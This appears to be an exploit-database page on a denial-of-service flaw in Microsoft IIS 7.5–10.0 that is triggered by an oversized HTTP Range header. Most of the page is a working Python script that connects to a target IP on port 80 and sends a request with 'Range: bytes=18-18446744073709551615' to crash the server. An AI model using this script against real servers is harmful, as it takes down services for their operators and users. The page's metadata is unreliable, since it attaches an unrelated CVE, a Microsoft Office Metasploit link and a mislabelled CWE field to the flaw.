header-logo
Suggest Exploit
vendor:
IIS
by:
Anonymous
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: IIS
Affected Version From: IIS 7.5
Affected Version To: IIS 10.0
Patch Exists: YES
Related CWE: CVE-2018-8248
CPE: a:microsoft:iis
Metasploit: https://www.rapid7.com/db/vulnerabilities/microsoft-office-cve-2018-8248/https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8248/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=101953https://www.infosecmatter.com/nessus-plugin-library/?id=17703https://www.infosecmatter.com/nessus-plugin-library/?id=44081https://www.infosecmatter.com/nessus-plugin-library/?id=69706
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2018

IIS Range Header Denial of Service Vulnerability

This exploit is a denial of service vulnerability in Microsoft IIS web server. It is caused by a specially crafted HTTP request with a range header that specifies a very large range. This causes the server to crash and become unresponsive.

Mitigation:

Microsoft has released a patch for this vulnerability. It is recommended to update the server to the latest version.
Source

Exploit-DB raw data:

#Tested on Win Srv 2012R2.
import socket,sys
 
if len(sys.argv)<=1:	
 sys.exit('Give me an IP')

Host = sys.argv[1]

def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()

#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"

SendPayload(Init, Host)
SendPayload(Payload, Host)

Navigation

Suggest Exploit

Services By CQR